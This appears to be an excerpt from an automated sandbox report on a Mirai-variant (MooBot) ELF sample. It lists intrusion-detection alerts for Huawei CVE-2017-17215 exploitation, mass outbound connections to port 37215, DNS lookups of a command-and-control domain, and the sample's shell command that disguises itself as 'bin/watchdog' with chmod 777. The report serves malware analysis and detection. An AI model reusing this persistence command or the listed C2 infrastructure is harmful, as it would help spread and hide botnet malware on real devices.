                  03/20/23-16:00:22.715968 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 33038 | 37215 | 192.168.2.23 | 197.234.59.68
                  03/20/23-15:59:50.971789 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 57718 | 37215 | 192.168.2.23 | 41.34.164.79
                  03/20/23-16:00:49.089429 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 59786 | 53 | 192.168.2.23 | 8.8.8.8
                  03/20/23-16:01:13.960170 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 55414 | 37215 | 192.168.2.23 | 20.28.196.139
                  03/20/23-15:59:47.422349 | TCP | 2030490 | ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) | 47796 | 56999 | 192.168.2.23 | 156.224.24.249
                  Mar 20, 2023 15:59:46.835329056 CET153537215192.168.2.23157.171.54.124
                  Mar 20, 2023 15:59:46.835372925 CET153537215192.168.2.23197.198.147.97
                  Mar 20, 2023 15:59:46.835395098 CET153537215192.168.2.23157.56.100.50
                  Mar 20, 2023 15:59:46.835417986 CET153537215192.168.2.2332.196.123.107
                  Mar 20, 2023 15:59:46.835443974 CET153537215192.168.2.23157.85.243.10
                  Mar 20, 2023 15:59:46.835469961 CET153537215192.168.2.2341.152.244.247
                  Mar 20, 2023 15:59:46.835500956 CET153537215192.168.2.23184.199.41.192
                  Mar 20, 2023 15:59:46.835535049 CET153537215192.168.2.2367.232.166.126
                  Mar 20, 2023 15:59:46.835561991 CET153537215192.168.2.2341.209.49.128
                  Mar 20, 2023 15:59:46.835591078 CET153537215192.168.2.23163.198.50.144
                  Mar 20, 2023 15:59:46.835613012 CET153537215192.168.2.2341.219.5.134
                  Mar 20, 2023 15:59:46.835633039 CET153537215192.168.2.2341.81.255.113
                  Mar 20, 2023 15:59:46.835671902 CET153537215192.168.2.23153.139.178.236
                  Mar 20, 2023 15:59:46.835699081 CET153537215192.168.2.23107.251.18.105
                  Mar 20, 2023 15:59:46.835724115 CET153537215192.168.2.23197.26.152.231
                  Mar 20, 2023 15:59:46.835772038 CET153537215192.168.2.23197.89.224.214
                  Mar 20, 2023 15:59:46.835800886 CET153537215192.168.2.23157.215.74.158
                  Mar 20, 2023 15:59:46.835824013 CET153537215192.168.2.2341.68.189.93
                  Mar 20, 2023 15:59:46.835874081 CET153537215192.168.2.23157.247.249.84
                  Mar 20, 2023 15:59:46.835897923 CET153537215192.168.2.23157.52.242.6
                  Mar 20, 2023 15:59:46.835936069 CET153537215192.168.2.23157.203.31.65
                  Mar 20, 2023 15:59:46.835994005 CET153537215192.168.2.2341.59.75.104
                  Mar 20, 2023 15:59:46.836019993 CET153537215192.168.2.2341.120.113.154
                  Mar 20, 2023 15:59:46.836052895 CET153537215192.168.2.2341.72.62.52
                  Mar 20, 2023 15:59:46.836077929 CET153537215192.168.2.23148.40.162.183
                  Mar 20, 2023 15:59:46.836103916 CET153537215192.168.2.2376.202.191.68
                  Mar 20, 2023 15:59:46.836149931 CET153537215192.168.2.23157.193.163.186
                  Mar 20, 2023 15:59:46.836177111 CET153537215192.168.2.23157.32.3.105
                  Mar 20, 2023 15:59:46.836241007 CET153537215192.168.2.23197.203.164.65
                  Mar 20, 2023 15:59:46.836271048 CET153537215192.168.2.2341.170.187.146
                  Mar 20, 2023 15:59:46.836271048 CET153537215192.168.2.2341.158.241.252
                  Mar 20, 2023 15:59:46.836288929 CET153537215192.168.2.23197.221.139.5
                  Mar 20, 2023 15:59:46.836375952 CET153537215192.168.2.23197.204.102.129
                  Mar 20, 2023 15:59:46.836411953 CET153537215192.168.2.23219.89.123.50
                  Mar 20, 2023 15:59:46.836438894 CET153537215192.168.2.23197.38.164.8
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Mar 20, 2023 15:59:46.829796076 CET | 192.168.2.23 | 8.8.8.8 | 0xa123 | Standard query (0) | j.xnyidc.top | A (IP address) | IN (0x0001) | false
                  Mar 20, 2023 16:00:49.089428902 CET | 192.168.2.23 | 8.8.8.8 | 0xb38e | Standard query (0) | j.xnyidc.top | A (IP address) | IN (0x0001) | false

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Mar 20, 2023 15:59:47.205801010 CET | 8.8.8.8 | 192.168.2.23 | 0xa123 | No error (0) | j.xnyidc.top | | 156.224.24.249 | A (IP address) | IN (0x0001) | false
                  Mar 20, 2023 16:00:49.369513035 CET | 8.8.8.8 | 192.168.2.23 | 0xb38e | No error (0) | j.xnyidc.top | | 156.224.24.249 | A (IP address) | IN (0x0001) | false

                  System Behavior

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /tmp/lD25Z9LfKe.elf
                  Arguments: /tmp/lD25Z9LfKe.elf
                  File size: 5388968 bytes
                  MD5 hash: ae65271c943d3451b7f026d1fadccea6

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /tmp/lD25Z9LfKe.elf
                  Arguments: n/a
                  File size: 5388968 bytes
                  MD5 hash: ae65271c943d3451b7f026d1fadccea6

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/lD25Z9LfKe.elf bin/watchdog; chmod 777 bin/watchdog"
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: n/a
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /usr/bin/rm
                  Arguments: rm -rf bin/watchdog
                  File size: 72056 bytes
                  MD5 hash: aa2b5496fdbfd88e38791ab81f90b95b

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: n/a
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /usr/bin/mkdir
                  Arguments: mkdir bin
                  File size: 88408 bytes
                  MD5 hash: 088c9d1df5a28ed16c726eca15964cb7

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: n/a
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /usr/bin/mv
                  Arguments: mv /tmp/lD25Z9LfKe.elf bin/watchdog
                  File size: 149888 bytes
                  MD5 hash: 504f0590fa482d4da070a702260e3716

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: n/a
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /usr/bin/chmod
                  Arguments: chmod 777 bin/watchdog
                  File size: 63864 bytes
                  MD5 hash: 739483b900c045ae1374d6f53a86a279

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /tmp/lD25Z9LfKe.elf
                  Arguments: n/a
                  File size: 5388968 bytes
                  MD5 hash: ae65271c943d3451b7f026d1fadccea6

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /tmp/lD25Z9LfKe.elf
                  Arguments: n/a
                  File size: 5388968 bytes
                  MD5 hash: ae65271c943d3451b7f026d1fadccea6

                  Start time: 15:59:45
                  Start date: 20/03/2023
                  Path: /tmp/lD25Z9LfKe.elf
                  Arguments: n/a
                  File size: 5388968 bytes
                  MD5 hash: ae65271c943d3451b7f026d1fadccea6